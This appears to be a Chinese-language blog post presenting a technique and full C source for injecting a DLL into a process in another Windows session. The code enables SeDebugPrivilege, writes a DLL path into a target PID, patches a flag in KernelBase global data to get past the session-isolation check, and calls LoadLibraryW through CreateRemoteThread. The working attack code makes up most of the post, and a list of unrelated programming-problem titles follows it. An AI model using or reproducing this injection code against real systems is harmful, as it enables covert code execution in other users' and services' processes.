跨session注入dll

有一件有意思的事 SESSION 隔離是在 RING 3 實作的，而非在 RING 0 裡實作，意思是使用者層可以修改session的标志位，CreateRemoteThreadEx中會判斷目前的會話級别，這裡隻需要在應用層修改自己的KernelBaseGlobalData+0x4的位置的資料為1就能完成跨session注入，但是有的程序你還是注入不了，這個也隻能解決在不同session下dll注入的問題，下圖是注入成功的圖

代碼如下所示

#include<windows.h>
#include<stdio.h>

typedef void* (__fastcall *LPFN_KernelBaseGetGlobalData)(void);


BOOL WINAPI InjectDllExW(DWORD dwPID, PCWSTR pwszProxyFile)
{
  BOOL ret = FALSE;
  HANDLE hToken = NULL;
  HANDLE hProcess = NULL;
  HANDLE hThread = NULL;
  FARPROC pfnThreadRtn = NULL;
  PWSTR pwszPara = NULL;
  PVOID pRemoteShellcode = NULL;

  hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
  if (!hProcess) {
    //printf("Open Process failed\n");
    return FALSE;
  }

  //得到函數位址，三環下對應的位置api位址都是相同的
  pfnThreadRtn = GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryW");

  //寫入字元串到被注入的程序
  size_t iProxyFileLen = wcslen(pwszProxyFile) * sizeof(WCHAR);
  pwszPara = (PWSTR)VirtualAllocEx(hProcess, NULL, iProxyFileLen, MEM_COMMIT,PAGE_READWRITE);

  if (!pwszPara) {
    //printf("VirtualAllocEx failed\n");
    return FALSE;
  }

  WriteProcessMemory(hProcess, pwszPara, (PVOID)pwszProxyFile, iProxyFileLen, NULL);

  //找修改的位置
  LPFN_KernelBaseGetGlobalData pKernelBaseGetGlobalData = NULL;
  UCHAR* pGlobalData = NULL;
  UCHAR* pMisc = NULL;
  ULONG PatchOffset = 0;

  pKernelBaseGetGlobalData =(LPFN_KernelBaseGetGlobalData)GetProcAddress(LoadLibraryW(L"KernelBase.dll"), "KernelBaseGetGlobalData");
  pGlobalData = (UCHAR*)pKernelBaseGetGlobalData();


  PatchOffset = 0x4;

  printf("PatchOffset: %x\n", pwszPara);

  pMisc = pGlobalData + PatchOffset;
  *pMisc = 1;


  //建立遠端線程
  hThread = CreateRemoteThread(hProcess, NULL, 0,(LPTHREAD_START_ROUTINE)pfnThreadRtn, pwszPara, 0, NULL);

  //等待結束
  WaitForSingleObject(hThread, INFINITE);
  CloseHandle(hThread);
  VirtualFreeEx(hProcess, pwszPara, 0, MEM_RELEASE);
  CloseHandle(hProcess);
  return TRUE;
}

BOOL EnableDebugPrivilege()
{
  HANDLE hToken;
  LUID sedebugnameValue;
  TOKEN_PRIVILEGES tkp;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
    return   FALSE;
  }
  if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
    CloseHandle(hToken);
    return FALSE;
  }
  tkp.PrivilegeCount = 1;
  tkp.Privileges[0].Luid = sedebugnameValue;
  tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
    CloseHandle(hToken);
    return FALSE;
  }
  return TRUE;
}

int main() {


  EnableDebugPrivilege();
  InjectDllExW(3288,L"C:\\Users\\Administrator\\Desktop\\InJecteDll.dll");


  //LoadLibraryW(L"InJecteDll.dll");
  system("pause");
  return 0;
}

跨session注入dll

繼續閱讀

HDU 5344 MZL's xor

UVA 590 Always on the run

FZU 1978 Repair the brackets

UVA 10344- 23 out of 5

ZOJ 3935 2016

POJ 2115 C Looooops

HDU 5381 The sum of gcd

ZOJ 1104 Leaps Tall Buildings

ZOJ 3700 Ever Dream

HDU 2821 Pusher

ZOJ 1199 Point of Intersection

UVA 1401 Remember the Word

UVA 620 Cellular Structure

ZOJ 2748 Free Kick

CSU 1567 Reverse Rot

UVA 519 Puzzle (II)